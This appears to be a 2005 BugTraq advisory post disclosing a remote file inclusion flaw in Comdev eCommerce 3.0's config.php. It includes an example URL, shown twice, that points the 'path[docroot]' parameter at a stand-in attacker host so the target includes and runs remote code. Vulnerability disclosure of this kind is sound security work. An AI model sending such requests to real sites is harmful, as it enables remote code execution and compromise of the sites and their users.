BugTraq
Back to list
|
Post reply
Comdev eCommerce config.php Vulnerability
Aug 05 2005 01:57AM
none none com
Class: Input Validation Error
Vulnerable: Comdev Comdev eCommerce 3.0
The config.php script can be passed a "path[docroot]" http request parameter to change the location of an included file.
Example:
http://www.vulnerable.com/oneadmin/config.php?path[docroot]=http://www.h
acker.com/badscript.php.txt
[ reply ]
Privacy Statement
Copyright 2010, SecurityFocus
Vulnerable: Comdev Comdev eCommerce 3.0
The config.php script can be passed a "path[docroot]" http request parameter to change the location of an included file.
Example:
http://www.vulnerable.com/oneadmin/config.php?path[docroot]=http://www.h
acker.com/badscript.php.txt
[ reply ]